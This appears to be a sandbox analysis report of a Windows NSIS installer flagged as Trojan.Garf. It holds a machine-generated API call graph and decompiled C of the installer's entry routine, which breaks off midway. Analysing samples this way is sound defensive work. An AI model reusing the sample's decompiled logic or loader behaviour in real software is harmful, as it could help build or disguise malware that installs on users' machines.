4017a9 3903 405f37 3 API calls 3902->3903 3904 4017af lstrcatW 3903->3904 3904->3901 3925 4017bb 3905->3925 3906 40699e 2 API calls 3906->3925 3907 406133 2 API calls 3907->3925 3909 4017cd CompareFileTime 3909->3925 3910 40188d 3912 4056ca 24 API calls 3910->3912 3911 401864 3913 4056ca 24 API calls 3911->3913 3921 401879 3911->3921 3914 401897 3912->3914 3913->3921 3915 403371 44 API calls 3914->3915 3916 4018aa 3915->3916 3917 4018be SetFileTime 3916->3917 3918 4018d0 FindCloseChangeNotification 3916->3918 3917->3918 3920 4018e1 3918->3920 3918->3921 3919 4066a5 17 API calls 3919->3925 3923 4018e6 3920->3923 3924 4018f9 3920->3924 3922 406668 lstrcpynW 3922->3925 3926 4066a5 17 API calls 3923->3926 3927 4066a5 17 API calls 3924->3927 3925->3906 3925->3907 3925->3909 3925->3910 3925->3911 3925->3919 3925->3922 3928 405cc8 MessageBoxIndirectW 3925->3928 3932 406158 GetFileAttributesW CreateFileW 3925->3932 3929 4018ee lstrcatW 3926->3929 3930 401901 3927->3930 3928->3925 3929->3930 3931 405cc8 MessageBoxIndirectW 3930->3931 3931->3921 3932->3925 3933->3901 3934->3902 4187 401a72 4188 402d84 17 API calls 4187->4188 4189 401a7b 4188->4189 4190 402d84 17 API calls 4189->4190 4191 401a20 4190->4191 4192 401573 4193 401583 ShowWindow 4192->4193 4194 40158c 4192->4194 4193->4194 4195 402c2a 4194->4195 4196 40159a ShowWindow 4194->4196 4196->4195 4197 4023f4 4198 402da6 17 API calls 4197->4198 4199 402403 4198->4199 4200 402da6 17 API calls 4199->4200 4201 40240c 4200->4201 4202 402da6 17 API calls 4201->4202 4203 402416 GetPrivateProfileStringW 4202->4203 4204 4014f5 SetForegroundWindow 4205 402c2a 4204->4205 4206 401ff6 4207 402da6 17 API calls 4206->4207 4208 401ffd 4207->4208 4209 40699e 2 API calls 4208->4209 4210 402003 4209->4210 4212 402014 4210->4212 4213 4065af wsprintfW 4210->4213 4213->4212 4214 401b77 4215 402da6 17 API calls 4214->4215 4216 401b7e 4215->4216 4217 402d84 17 API calls 4216->4217 4218 401b87 wsprintfW 4217->4218 4219 402c2a 4218->4219 4220 4046fa lstrcpynW lstrlenW 4221 40167b 4222 402da6 17 API calls 4221->4222 4223 401682 4222->4223 4224 402da6 17 API calls 4223->4224 4225 40168b 4224->4225 4226 402da6 17 API calls 4225->4226 4227 401694 MoveFileW 4226->4227 4228 4016a0 4227->4228 4229 4016a7 4227->4229 4231 401423 24 API calls 4228->4231 4230 40699e 2 API calls 4229->4230 4233 4022f6 4229->4233 4232 4016b6 4230->4232 4231->4233 4232->4233 4234 406428 36 API calls 4232->4234 4234->4228 4242 4019ff 4243 402da6 17 API calls 4242->4243 4244 401a06 4243->4244 4245 402da6 17 API calls 4244->4245 4246 401a0f 4245->4246 4247 401a16 lstrcmpiW 4246->4247 4248 401a28 lstrcmpW 4246->4248 4249 401a1c 4247->4249 4248->4249 4250 4022ff 4251 402da6 17 API calls 4250->4251 4252 402305 4251->4252 4253 402da6 17 API calls 4252->4253 4254 40230e 4253->4254 4255 402da6 17 API calls 4254->4255 4256 402317 4255->4256 4257 40699e 2 API calls 4256->4257 4258 402320 4257->4258 4259 402331 lstrlenW lstrlenW 4258->4259 4260 402324 4258->4260 4262 4056ca 24 API calls 4259->4262 4261 4056ca 24 API calls 4260->4261 4264 40232c 4260->4264 4261->4264 4263 40236f SHFileOperationW 4262->4263 4263->4260 4263->4264 4265 401000 4266 401037 BeginPaint GetClientRect 4265->4266 4267 40100c DefWindowProcW 4265->4267 4269 4010f3 4266->4269 4270 401179 4267->4270 4271 401073 CreateBrushIndirect FillRect DeleteObject 4269->4271 4272 4010fc 4269->4272 4271->4269 4273 401102 CreateFontIndirectW 4272->4273 4274 401167 EndPaint 4272->4274 4273->4274 4275 401112 6 API calls 4273->4275 4274->4270 4275->4274 4276 401d81 4277 401d94 GetDlgItem 4276->4277 4278 401d87 4276->4278 4280 401d8e 4277->4280 4279 402d84 17 API calls 4278->4279 4279->4280 4281 401dd5 GetClientRect LoadImageW SendMessageW 4280->4281 4283 402da6 17 API calls 4280->4283 4284 401e33 4281->4284 4286 401e3f 4281->4286 4283->4281 4285 401e38 DeleteObject 4284->4285 4284->4286 4285->4286 4287 401503 4288 40150b 4287->4288 4290 40151e 4287->4290 4289 402d84 17 API calls 4288->4289 4289->4290 4291 404783 4292 40479b 4291->4292 4296 4048b5 4291->4296 4297 4045c4 18 API calls 4292->4297 4293 40491f 4294 4049e9 4293->4294 4295 404929 GetDlgItem 4293->4295 4302 40462b 8 API calls 4294->4302 4298 404943 4295->4298 4299 4049aa 4295->4299 4296->4293 4296->4294 4300 4048f0 GetDlgItem SendMessageW 4296->4300 4301 404802 4297->4301 4298->4299 4307 404969 SendMessageW LoadCursorW SetCursor 4298->4307 4299->4294 4303 4049bc 4299->4303 4324 4045e6 EnableWindow 4300->4324 4305 4045c4 18 API calls 4301->4305 4306 4049e4 4302->4306 4308 4049d2 4303->4308 4309 4049c2 SendMessageW 4303->4309 4311 40480f CheckDlgButton 4305->4311 4328 404a32 4307->4328 4308->4306 4314 4049d8 SendMessageW 4308->4314 4309->4308 4310 40491a 4325 404a0e 4310->4325 4322 4045e6 EnableWindow 4311->4322 4314->4306 4317 40482d GetDlgItem 4323 4045f9 SendMessageW 4317->4323 4319 404843 SendMessageW 4320 404860 GetSysColor 4319->4320 4321 404869 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4319->4321 4320->4321 4321->4306 4322->4317 4323->4319 4324->4310 4326 404a21 SendMessageW 4325->4326 4327 404a1c 4325->4327 4326->4293 4327->4326 4331 405c8e ShellExecuteExW 4328->4331 4330 404998 LoadCursorW SetCursor 4330->4299 4331->4330 4332 402383 4333 40238a 4332->4333 4336 40239d 4332->4336 4334 4066a5 17 API calls 4333->4334 4335 402397 4334->4335 4337 405cc8 MessageBoxIndirectW 4335->4337 4337->4336 4338 402c05 SendMessageW 4339 402c2a 4338->4339 4340 402c1f InvalidateRect 4338->4340 4340->4339 4341 405809 4342 4059b3 4341->4342 4343 40582a GetDlgItem GetDlgItem GetDlgItem 4341->4343 4345 4059e4 4342->4345 4346 4059bc GetDlgItem CreateThread CloseHandle 4342->4346 4386 4045f9 SendMessageW 4343->4386 4348 405a0f 4345->4348 4349 405a34 4345->4349 4350 4059fb ShowWindow ShowWindow 4345->4350 4346->4345 4347 40589a 4352 4058a1 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4347->4352 4351 405a6f 4348->4351 4354 405a23 4348->4354 4355 405a49 ShowWindow 4348->4355 4356 40462b 8 API calls 4349->4356 4388 4045f9 SendMessageW 4350->4388 4351->4349 4361 405a7d SendMessageW 4351->4361 4359 4058f3 SendMessageW SendMessageW 4352->4359 4360 40590f 4352->4360 4362 40459d SendMessageW 4354->4362 4357 405a69 4355->4357 4358 405a5b 4355->4358 4367 405a42 4356->4367 4364 40459d SendMessageW 4357->4364 4363 4056ca 24 API calls 4358->4363 4359->4360 4365 405922 4360->4365 4366 405914 SendMessageW 4360->4366 4361->4367 4368 405a96 CreatePopupMenu 4361->4368 4362->4349 4363->4357 4364->4351 4370 4045c4 18 API calls 4365->4370 4366->4365 4369 4066a5 17 API calls 4368->4369 4371 405aa6 AppendMenuW 4369->4371 4372 405932 4370->4372 4373 405ac3 GetWindowRect 4371->4373 4374 405ad6 TrackPopupMenu 4371->4374 4375 40593b ShowWindow 4372->4375 4376 40596f GetDlgItem SendMessageW 4372->4376 4373->4374 4374->4367 4378 405af1 4374->4378 4379 405951 ShowWindow 4375->4379 4380 40595e 4375->4380 4376->4367 4377 405996 SendMessageW SendMessageW 4376->4377 4377->4367 4381 405b0d SendMessageW 4378->4381 4379->4380 4387 4045f9 SendMessageW 4380->4387 4381->4381 4382 405b2a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4381->4382 4384 405b4f SendMessageW 4382->4384 4384->4384 4385 405b78 GlobalUnlock SetClipboardData CloseClipboard 4384->4385 4385->4367 4386->4347 4387->4376 4388->4348 4389 40248a 4390 402da6 17 API calls 4389->4390 4391 40249c 4390->4391 4392 402da6 17 API calls 4391->4392 4393 4024a6 4392->4393 4406 402e36 4393->4406 4396 40292e 4397 4024de 4399 4024ea 4397->4399 4402 402d84 17 API calls 4397->4402 4398 402da6 17 API calls 4401 4024d4 lstrlenW 4398->4401 4400 402509 RegSetValueExW 4399->4400 4403 403371 44 API calls 4399->4403 4404 40251f RegCloseKey 4400->4404 4401->4397 4402->4399 4403->4400 4404->4396 4407 402e51 4406->4407 4410 406503 4407->4410 4411 406512 4410->4411 4412 4024b6 4411->4412 4413 40651d RegCreateKeyExW 4411->4413 4412->4396 4412->4397 4412->4398 4413->4412 4414 404e0b 4415 404e37 4414->4415 4416 404e1b 4414->4416 4418 404e6a 4415->4418 4419 404e3d SHGetPathFromIDListW 4415->4419 4425 405cac GetDlgItemTextW 4416->4425 4420 404e54 SendMessageW 4419->4420 4421 404e4d 4419->4421 4420->4418 4423 40140b 2 API calls 4421->4423 4422 404e28 SendMessageW 4422->4415 4423->4420 4425->4422 4426 40290b 4427 402da6 17 API calls 4426->4427 4428 402912 FindFirstFileW 4427->4428 4429 40293a 4428->4429 4433 402925 4428->4433 4434 4065af wsprintfW 4429->4434 4431 402943 4435 406668 lstrcpynW 4431->4435 4434->4431 4435->4433 4436 40190c 4437 401943 4436->4437 4438 402da6 17 API calls 4437->4438 4439 401948 4438->4439 4440 405d74 67 API calls 4439->4440 4441 401951 4440->4441 4442 40190f 4443 402da6 17 API calls 4442->4443 4444 401916 4443->4444 4445 405cc8 MessageBoxIndirectW 4444->4445 4446 40191f 4445->4446 4447 401491 4448 4056ca 24 API calls 4447->4448 4449 401498 4448->4449 4450 402891 4451 402898 4450->4451 4452 402ba9 4450->4452 4453 402d84 17 API calls 4451->4453 4454 40289f 4453->4454 4455 4028ae SetFilePointer 4454->4455 4455->4452 4456 4028be 4455->4456 4458 4065af wsprintfW 4456->4458 4458->4452 4459 401f12 4460 402da6 17 API calls 4459->4460 4461 401f18 4460->4461 4462 402da6 17 API calls 4461->4462 4463 401f21 4462->4463 4464 402da6 17 API calls 4463->4464 4465 401f2a 4464->4465 4466 402da6 17 API calls 4465->4466 4467 401f33 4466->4467 4468 401423 24 API calls 4467->4468 4469 401f3a 4468->4469 4476 405c8e ShellExecuteExW 4469->4476 4471 401f82 4472 406ae0 5 API calls 4471->4472 4474 40292e 4471->4474 4473 401f9f CloseHandle 4472->4473 4473->4474 4476->4471 4477 402f93 4478 402fa5 SetTimer 4477->4478 4479 402fbe 4477->4479 4478->4479 4480 40300c 4479->4480 4481 403012 MulDiv 4479->4481 4482 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 4481->4482 4482->4480 4498 401d17 4499 402d84 17 API calls 4498->4499 4500 401d1d IsWindow 4499->4500 4501 401a20 4500->4501 4502 401b9b 4503 401ba8 4502->4503 4504 401bec 4502->4504 4511 401bbf 4503->4511 4513 401c31 4503->4513 4505 401bf1 4504->4505 4506 401c16 GlobalAlloc 4504->4506 4510 40239d 4505->4510 4523 406668 lstrcpynW 4505->4523 4508 4066a5 17 API calls 4506->4508 4507 4066a5 17 API calls 4509 402397 4507->4509 4508->4513 4517 405cc8 MessageBoxIndirectW 4509->4517 4521 406668 lstrcpynW 4511->4521 4513->4507 4513->4510 4515 401c03 GlobalFree 4515->4510 4516 401bce 4522 406668 lstrcpynW 4516->4522 4517->4510 4519 401bdd 4524 406668 lstrcpynW 4519->4524 4521->4516 4522->4519 4523->4515 4524->4510 4525 40261c 4526 402da6 17 API calls 4525->4526 4527 402623 4526->4527 4530 406158 GetFileAttributesW CreateFileW 4527->4530 4529 40262f 4530->4529 4538 40149e 4539 4014ac PostQuitMessage 4538->4539 4540 40239d 4538->4540 4539->4540 4541 40259e 4551 402de6 4541->4551 4544 402d84 17 API calls 4545 4025b1 4544->4545 4546 4025d9 RegEnumValueW 4545->4546 4547 4025cd RegEnumKeyW 4545->4547 4549 40292e 4545->4549 4548 4025ee RegCloseKey 4546->4548 4547->4548 4548->4549 4552 402da6 17 API calls 4551->4552 4553 402dfd 4552->4553 4554 4064d5 RegOpenKeyExW 4553->4554 4555 4025a8 4554->4555 4555->4544 4556 4015a3 4557 402da6 17 API calls 4556->4557 4558 4015aa SetFileAttributesW 4557->4558 4559 4015bc 4558->4559 3755 401fa4 3756 402da6 17 API calls 3755->3756 3757 401faa 3756->3757 3758 4056ca 24 API calls 3757->3758 3759 401fb4 3758->3759 3760 405c4b 2 API calls 3759->3760 3761 401fba 3760->3761 3762 401fdd CloseHandle 3761->3762 3766 40292e 3761->3766 3770 406ae0 WaitForSingleObject 3761->3770 3762->3766 3765 401fcf 3767 401fd4 3765->3767 3768 401fdf 3765->3768 3775 4065af wsprintfW 3767->3775 3768->3762 3771 406afa 3770->3771 3772 406b0c GetExitCodeProcess 3771->3772 3773 406a71 2 API calls 3771->3773 3772->3765 3774 406b01 WaitForSingleObject 3773->3774 3774->3771 3775->3762 3875 403c25 3876 403c40 3875->3876 3877 403c36 CloseHandle 3875->3877 3878 403c54 3876->3878 3879 403c4a CloseHandle 3876->3879 3877->3876 3884 403c82 3878->3884 3879->3878 3882 405d74 67 API calls 3883 403c65 3882->3883 3885 403c90 3884->3885 3886 403c59 3885->3886 3887 403c95 FreeLibrary GlobalFree 3885->3887 3886->3882 3887->3886 3887->3887 4560 40202a 4561 402da6 17 API calls 4560->4561 4562 402031 4561->4562 4563 406a35 5 API calls 4562->4563 4564 402040 4563->4564 4565 40205c GlobalAlloc 4564->4565 4566 4020cc 4564->4566 4565->4566 4567 402070 4565->4567 4568 406a35 5 API calls 4567->4568 4569 402077 4568->4569 4570 406a35 5 API calls 4569->4570 4571 402081 4570->4571 4571->4566 4575 4065af wsprintfW 4571->4575 4573 4020ba 4576 4065af wsprintfW 4573->4576 4575->4573 4576->4566 4577 40252a 4578 402de6 17 API calls 4577->4578 4579 402534 4578->4579 4580 402da6 17 API calls 4579->4580 4581 40253d 4580->4581 4582 402548 RegQueryValueExW 4581->4582 4585 40292e 4581->4585 4583 40256e RegCloseKey 4582->4583 4584 402568 4582->4584 4583->4585 4584->4583 4588 4065af wsprintfW 4584->4588 4588->4583 4589 4021aa 4590 402da6 17 API calls 4589->4590 4591 4021b1 4590->4591 4592 402da6 17 API calls 4591->4592 4593 4021bb 4592->4593 4594 402da6 17 API calls 4593->4594 4595 4021c5 4594->4595 4596 402da6 17 API calls 4595->4596 4597 4021cf 4596->4597 4598 402da6 17 API calls 4597->4598 4599 4021d9 4598->4599 4600 402218 CoCreateInstance 4599->4600 4601 402da6 17 API calls 4599->4601 4604 402237 4600->4604 4601->4600 4602 401423 24 API calls 4603 4022f6 4602->4603 4604->4602 4604->4603 4612 401a30 4613 402da6 17 API calls 4612->4613 4614 401a39 ExpandEnvironmentStringsW 4613->4614 4615 401a60 4614->4615 4616 401a4d 4614->4616 4616->4615 4617 401a52 lstrcmpW 4616->4617 4617->4615 4618 405031 GetDlgItem GetDlgItem 4619 405083 7 API calls 4618->4619 4620 4052a8 4618->4620 4621 40512a DeleteObject 4619->4621 4622 40511d SendMessageW 4619->4622 4625 40538a 4620->4625 4652 405317 4620->4652 4672 404f7f SendMessageW 4620->4672 4623 405133 4621->4623 4622->4621 4624 40516a 4623->4624 4628 4066a5 17 API calls 4623->4628 4626 4045c4 18 API calls 4624->4626 4627 405436 4625->4627 4631 40529b 4625->4631 4637 4053e3 SendMessageW 4625->4637 4630 40517e 4626->4630 4632 405440 SendMessageW 4627->4632 4633 405448 4627->4633 4629 40514c SendMessageW SendMessageW 4628->4629 4629->4623 4636 4045c4 18 API calls 4630->4636 4634 40462b 8 API calls 4631->4634 4632->4633 4640 405461 4633->4640 4641 40545a ImageList_Destroy 4633->4641 4648 405471 4633->4648 4639 405637 4634->4639 4653 40518f 4636->4653 4637->4631 4643 4053f8 SendMessageW 4637->4643 4638 40537c SendMessageW 4638->4625 4644 40546a GlobalFree 4640->4644 4640->4648 4641->4640 4642 4055eb 4642->4631 4649 4055fd ShowWindow GetDlgItem ShowWindow 4642->4649 4646 40540b 4643->4646 4644->4648 4645 40526a GetWindowLongW SetWindowLongW 4647 405283 4645->4647 4657 40541c SendMessageW 4646->4657 4650 4052a0 4647->4650 4651 405288 ShowWindow 4647->4651 4648->4642 4665 4054ac 4648->4665 4677 404fff 4648->4677 4649->4631 4671 4045f9 SendMessageW 4650->4671 4670 4045f9 SendMessageW 4651->4670 4652->4625 4652->4638 4653->4645 4656 4051e2 SendMessageW 4653->4656 4658 405265 4653->4658 4659 405220 SendMessageW 4653->4659 4660 405234 SendMessageW 4653->4660 4656->4653 4657->4627 4658->4645 4658->4647 4659->4653 4660->4653 4662 4055b6 4663 4055c1 InvalidateRect 4662->4663 4666 4055cd 4662->4666 4663->4666 4664 4054da SendMessageW 4668 4054f0 4664->4668 4665->4664 4665->4668 4666->4642 4686 404f3a 4666->4686 4667 405564 SendMessageW SendMessageW 4667->4668 4668->4662 4668->4667 4670->4631 4671->4620 4673 404fa2 GetMessagePos ScreenToClient SendMessageW 4672->4673 4674 404fde SendMessageW 4672->4674 4675 404fd6 4673->4675 4676 404fdb 4673->4676 4674->4675 4675->4652 4676->4674 4689 406668 lstrcpynW 4677->4689 4679 405012 4690 4065af wsprintfW 4679->4690 4681 40501c 4682 40140b 2 API calls 4681->4682 4683 405025 4682->4683 4691 406668 lstrcpynW 4683->4691 4685 40502c 4685->4665 4692 404e71 4686->4692 4688 404f4f 4688->4642 4689->4679 4690->4681 4691->4685 4693 404e8a 4692->4693 4694 4066a5 17 API calls 4693->4694 4695 404eee 4694->4695 4696 4066a5 17 API calls 4695->4696 4697 404ef9 4696->4697 4698 4066a5 17 API calls 4697->4698 4699 404f0f lstrlenW wsprintfW SetDlgItemTextW 4698->4699 4699->4688 4705 4023b2 4706 4023ba 4705->4706 4709 4023c0 4705->4709 4707 402da6 17 API calls 4706->4707 4707->4709 4708 4023ce 4711 4023dc 4708->4711 4712 402da6 17 API calls 4708->4712 4709->4708 4710 402da6 17 API calls 4709->4710 4710->4708 4713 402da6 17 API calls 4711->4713 4712->4711 4714 4023e5 WritePrivateProfileStringW 4713->4714 4715 404734 lstrlenW 4716 404753 4715->4716 4717 404755 WideCharToMultiByte 4715->4717 4716->4717 4718 402434 4719 402467 4718->4719 4720 40243c 4718->4720 4722 402da6 17 API calls 4719->4722 4721 402de6 17 API calls 4720->4721 4723 402443 4721->4723 4724 40246e 4722->4724 4726 402da6 17 API calls 4723->4726 4728 40247b 4723->4728 4729 402e64 4724->4729 4727 402454 RegDeleteValueW RegCloseKey 4726->4727 4727->4728 4730 402e78 4729->4730 4732 402e71 4729->4732 4730->4732 4733 402ea9 4730->4733 4732->4728 4734 4064d5 RegOpenKeyExW 4733->4734 4735 402ed7 4734->4735 4736 402ee7 RegEnumValueW 4735->4736 4743 402f81 4735->4743 4745 402f0a 4735->4745 4737 402f71 RegCloseKey 4736->4737 4736->4745 4737->4743 4738 402f46 RegEnumKeyW 4739 402f4f RegCloseKey 4738->4739 4738->4745 4740 406a35 5 API calls 4739->4740 4741 402f5f 4740->4741 4741->4743 4744 402f63 RegDeleteKeyW 4741->4744 4742 402ea9 6 API calls 4742->4745 4743->4732 4744->4743 4745->4737 4745->4738 4745->4739 4745->4742 4746 401735 4747 402da6 17 API calls 4746->4747 4748 40173c SearchPathW 4747->4748 4749 401757 4748->4749 4750 404ab5 4751 404ae1 4750->4751 4752 404af2 4750->4752 4811 405cac GetDlgItemTextW 4751->4811 4754 404afe GetDlgItem 4752->4754 4759 404b5d 4752->4759 4757 404b12 4754->4757 4755 404c41 4760 404df0 4755->4760 4813 405cac GetDlgItemTextW 4755->4813 4756 404aec 4758 4068ef 5 API calls 4756->4758 4762 404b26 SetWindowTextW 4757->4762 4763 405fe2 4 API calls 4757->4763 4758->4752 4759->4755 4759->4760 4764 4066a5 17 API calls 4759->4764 4767 40462b 8 API calls 4760->4767 4766 4045c4 18 API calls 4762->4766 4768 404b1c 4763->4768 4769 404bd1 SHBrowseForFolderW 4764->4769 4765 404c71 4770 40603f 18 API calls 4765->4770 4771 404b42 4766->4771 4772 404e04 4767->4772 4768->4762 4776 405f37 3 API calls 4768->4776 4769->4755 4773 404be9 CoTaskMemFree 4769->4773 4774 404c77 4770->4774 4775 4045c4 18 API calls 4771->4775 4777 405f37 3 API calls 4773->4777 4814 406668 lstrcpynW 4774->4814 4778 404b50 4775->4778 4776->4762 4779 404bf6 4777->4779 4812 4045f9 SendMessageW 4778->4812 4782 404c2d SetDlgItemTextW 4779->4782 4787 4066a5 17 API calls 4779->4787 4782->4755 4783 404b56 4785 406a35 5 API calls 4783->4785 4784 404c8e 4786 406a35 5 API calls 4784->4786 4785->4759 4793 404c95 4786->4793 4788 404c15 lstrcmpiW 4787->4788 4788->4782 4791 404c26 lstrcatW 4788->4791 4789 404cd6 4815 406668 lstrcpynW 4789->4815 4791->4782 4792 404cdd 4794 405fe2 4 API calls 4792->4794 4793->4789 4797 405f83 2 API calls 4793->4797 4799 404d2e 4793->4799 4795 404ce3 GetDiskFreeSpaceW 4794->4795 4798 404d07 MulDiv 4795->4798 4795->4799 4797->4793 4798->4799 4801 404f3a 20 API calls 4799->4801 4809 404d9f 4799->4809 4800 404dc2 4816 4045e6 EnableWindow 4800->4816 4803 404d8c 4801->4803 4802 40140b 2 API calls 4802->4800 4805 404da1 SetDlgItemTextW 4803->4805 4806 404d91 4803->4806 4805->4809 4807 404e71 20 API calls 4806->4807 4807->4809 4808 404dde 4808->4760 4810 404a0e SendMessageW 4808->4810 4809->4800 4809->4802 4810->4760 4811->4756 4812->4783 4813->4765 4814->4784 4815->4792 4816->4808 4817 401d38 4818 402d84 17 API calls 4817->4818 4819 401d3f 4818->4819 4820 402d84 17 API calls 4819->4820 4821 401d4b GetDlgItem 4820->4821 4822 402638 4821->4822 4823 4014b8 4824 4014be 4823->4824 4825 401389 2 API calls 4824->4825 4826 4014c6 4825->4826 4827 40563e 4828 405662 4827->4828 4829 40564e 4827->4829 4832 40566a IsWindowVisible 4828->4832 4838 405681 4828->4838 4830 405654 4829->4830 4831 4056ab 4829->4831 4834 404610 SendMessageW 4830->4834 4833 4056b0 CallWindowProcW 4831->4833 4832->4831 4835 405677 4832->4835 4836 40565e 4833->4836 4834->4836 4837 404f7f 5 API calls 4835->4837 4837->4838 4838->4833 4839 404fff 4 API calls 4838->4839 4839->4831 4840 40263e 4841 402652 4840->4841 4842 40266d 4840->4842 4843 402d84 17 API calls 4841->4843 4844 402672 4842->4844 4845 40269d 4842->4845 4854 402659 4843->4854 4847 402da6 17 API calls 4844->4847 4846 402da6 17 API calls 4845->4846 4849 4026a4 lstrlenW 4846->4849 4848 402679 4847->4848 4857 40668a WideCharToMultiByte 4848->4857 4849->4854 4851 40268d lstrlenA 4851->4854 4852 4026e7 4853 4026d1 4853->4852 4855 40620a WriteFile 4853->4855 4854->4852 4854->4853 4856 406239 5 API calls 4854->4856 4855->4852 4856->4853 4857->4851

                                                                                              Executed Functions

                                                                                              Function 00403640 Relevance: 91.4, APIs: 34, Strings: 18, Instructions: 450stringfilecomCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 403640-403690 SetErrorMode GetVersionExW 1 403692-4036c6 GetVersionExW 0->1 2 4036ca-4036d1 0->2 1->2 3 4036d3 2->3 4 4036db-40371b 2->4 3->4 5 40371d-403725 call 406a35 4->5 6 40372e 4->6 5->6 11 403727 5->11 8 403733-403747 call 4069c5 lstrlenA 6->8 13 403749-403765 call 406a35 * 3 8->13 11->6 20 403776-4037d8 #17 OleInitialize SHGetFileInfoW call 406668 GetCommandLineW call 406668 13->20 21 403767-40376d 13->21 28 4037e1-4037f4 call 405f64 CharNextW 20->28 29 4037da-4037dc 20->29 21->20 25 40376f 21->25 25->20 32 4038eb-4038f1 28->32 29->28 33 4038f7 32->33 34 4037f9-4037ff 32->34 37 40390b-403925 GetTempPathW call 40360f 33->37 35 403801-403806 34->35 36 403808-40380e 34->36 35->35 35->36 38 403810-403814 36->38 39 403815-403819 36->39 47 403927-403945 GetWindowsDirectoryW lstrcatW call 40360f 37->47 48 40397d-403995 DeleteFileW call 4030d0 37->48 38->39 41 4038d9-4038e7 call 405f64 39->41 42 40381f-403825 39->42 41->32 58 4038e9-4038ea 41->58 45 403827-40382e 42->45 46 40383f-403878 42->46 51 403830-403833 45->51 52 403835 45->52 53 403894-4038ce 46->53 54 40387a-40387f 46->54 47->48 62 403947-403977 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40360f 47->62 64 40399b-4039a1 48->64 65 403b6c-403b7a ExitProcess OleUninitialize 48->65 51->46 51->52 52->46 56 4038d0-4038d4 53->56 57 4038d6-4038d8 53->57 54->53 60 403881-403889 54->60 56->57 63 4038f9-403906 call 406668 56->63 57->41 58->32 66 403890 60->66 67 40388b-40388e 60->67 62->48 62->65 63->37 69 4039a7-4039ba call 405f64 64->69 70 403a48-403a4f call 403d17 64->70 72 403b91-403b97 65->72 73 403b7c-403b8b call 405cc8 ExitProcess 65->73 66->53 67->53 67->66 88 403a0c-403a19 69->88 89 4039bc-4039f1 69->89 83 403a54-403a57 70->83 74 403b99-403bae GetCurrentProcess OpenProcessToken 72->74 75 403c0f-403c17 72->75 80 403bb0-403bd9 LookupPrivilegeValueW AdjustTokenPrivileges 74->80 81 403bdf-403bed call 406a35 74->81 84 403c19 75->84 85 403c1c-403c1f ExitProcess 75->85 80->81 95 403bfb-403c06 ExitWindowsEx 81->95 96 403bef-403bf9 81->96 83->65 84->85 90 403a1b-403a29 call 40603f 88->90 91 403a5c-403a70 call 405c33 lstrcatW 88->91 93 4039f3-4039f7 89->93 90->65 104 403a2f-403a45 call 406668 * 2 90->104 107 403a72-403a78 lstrcatW 91->107 108 403a7d-403a97 lstrcatW lstrcmpiW 91->108 98 403a00-403a08 93->98 99 4039f9-4039fe 93->99 95->75 101 403c08-403c0a call 40140b 95->101 96->95 96->101 98->93 103 403a0a 98->103 99->98 99->103 101->75 103->88 104->70 107->108 109 403b6a 108->109 110 403a9d-403aa0 108->110 109->65 112 403aa2-403aa7 call 405b99 110->112 113 403aa9 call 405c16 110->113 119 403aae-403abe SetCurrentDirectoryW 112->119 113->119 121 403ac0-403ac6 call 406668 119->121 122 403acb-403af7 call 406668 119->122 121->122 126 403afc-403b17 call 4066a5 DeleteFileW 122->126 129 403b57-403b61 126->129 130 403b19-403b29 CopyFileW 126->130 129->126 132 403b63-403b65 call 406428 129->132 130->129 131 403b2b-403b4b call 406428 call 4066a5 call 405c4b 130->131 131->129 140 403b4d-403b54 CloseHandle 131->140 132->109 140->129
                                                                                              C-Code - Quality: 78%
                                                                                              			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t119;
				intOrPtr* _t123;
				void* _t137;
				void* _t143;
				void* _t148;
				void* _t152;
				void* _t157;
				signed int _t167;
				void* _t170;
				void* _t175;
				intOrPtr _t177;
				intOrPtr _t178;
				intOrPtr* _t179;
				int _t188;
				void* _t189;
				void* _t198;
				signed int _t204;
				signed int _t209;
				signed int _t214;
				signed int _t216;
				int* _t218;
				signed int _t226;
				signed int _t229;
				CHAR* _t231;
				char* _t232;
				signed int _t233;
				WCHAR* _t234;
				void* _t250;

				_t216 = 0x20;
				_t188 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x42a318 = _v324.dwBuildNumber;
				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x42a31e != 0x600) {
					_t179 = E00406A35(_t188);
					if(_t179 != _t188) {
						 *_t179(0xc00);
					}
				}
				_t231 = "UXTHEME";
				do {
					E004069C5(_t231); // executed
					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
				} while ( *_t231 != 0);
				E00406A35(0xb);
				 *0x42a264 = E00406A35(9);
				_t88 = E00406A35(7);
				if(_t88 != _t188) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x42a31c =  *0x42a31c | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t188); // executed
				 *0x42a320 = _t88;
				SHGetFileInfoW(0x421708, _t188,  &_v1016, 0x2b4, _t188); // executed
				E00406668(0x429260, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t232 = L"\"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe\"";
				E00406668(_t232, _t92);
				_t94 = _t232;
				_t233 = 0x22;
